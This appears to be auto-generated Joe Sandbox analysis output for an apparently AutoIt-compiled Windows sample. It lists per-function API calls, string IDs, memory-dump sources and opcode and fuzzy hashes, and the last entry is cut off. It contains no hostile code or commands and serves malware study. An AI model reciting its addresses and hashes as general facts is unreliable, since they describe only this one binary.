                                                                                                                                              control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1937 4276c6-4276ca GetSystemInfo 1919->1937 1920->1919 1927 427698-4276a8 1920->1927 1921->1919 1929 427636-427640 1922->1929 1930 42762b-427631 1922->1930 1925 40e5a5-40e5ae 1923->1925 1926 427654-427657 1923->1926 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1918 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1918 1930->1918 1931->1918 1932->1918 1933->1919 1934->1919 1939 40e612-40e623 call 40efd0 1935->1939 1940 4276d5-4276df GetSystemInfo 1935->1940 1936->1935 1948 40e5e8 1936->1948 1937->1940 1938->1918 1939->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1939->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                                                                              APIs
                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                                              • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                                                              • String ID: 0SH$#v
                                                                                                                                              • API String ID: 3363477735-2448020801
                                                                                                                                              • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                              • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                                              • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                              • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                              • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                              • API String ID: 2574300362-3542929980
                                                                                                                                              • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                              • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                                              • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                              • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                                                              APIs
                                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeInfoLibraryParametersSystem
                                                                                                                                              • String ID: #v
                                                                                                                                              • API String ID: 3403648963-554117064
                                                                                                                                              • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                              • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                                              • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                              • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                                              APIs
                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                              • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                                              • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                              • API String ID: 1762048999-758534266
                                                                                                                                              • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                                              • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                              • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                                              • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                              • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                              • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                                              • __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                              • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                                                              • API String ID: 3948761352-1609664196
                                                                                                                                              • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                                                              • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                                              • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                                                              • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                                              • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                              • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                                              • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                                                • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                              • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                                                • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                              • _wcscat.LIBCMT ref: 00427541
                                                                                                                                              • _wcslen.LIBCMT ref: 00427551
                                                                                                                                              • _wcslen.LIBCMT ref: 00427562
                                                                                                                                              • _wcscat.LIBCMT ref: 0042757C
                                                                                                                                              • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                                              • String ID: Include$\
                                                                                                                                              • API String ID: 3173733714-3429789819
                                                                                                                                              • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                                              • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                                              • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                                              • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • _fseek.LIBCMT ref: 0045292B
                                                                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                                              • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                                              • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                                              • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                                              • _fseek.LIBCMT ref: 004529BF
                                                                                                                                              • _malloc.LIBCMT ref: 004529CA
                                                                                                                                              • _malloc.LIBCMT ref: 004529D6
                                                                                                                                              • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                                              • _free.LIBCMT ref: 00452A17
                                                                                                                                              • _free.LIBCMT ref: 00452A20
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1255752989-0
                                                                                                                                              • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                                                              • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                                                              • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                                                              • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                              • String ID: FILE
                                                                                                                                              • API String ID: 3888824918-3121273764
                                                                                                                                              • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                                              • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                                                              • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                                              • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                              • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                              • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(00AFF7A8,000000FF,00000000), ref: 00410552
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                                                              • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                              • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                                              • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                              • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                              • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                              • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                              • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                              • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AFF7A8,000000FF,00000000), ref: 00410552
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                                              • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                              • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                                              • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                              • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _malloc
                                                                                                                                              • String ID: Default
                                                                                                                                              • API String ID: 1579825452-753088835
                                                                                                                                              • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                                              • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
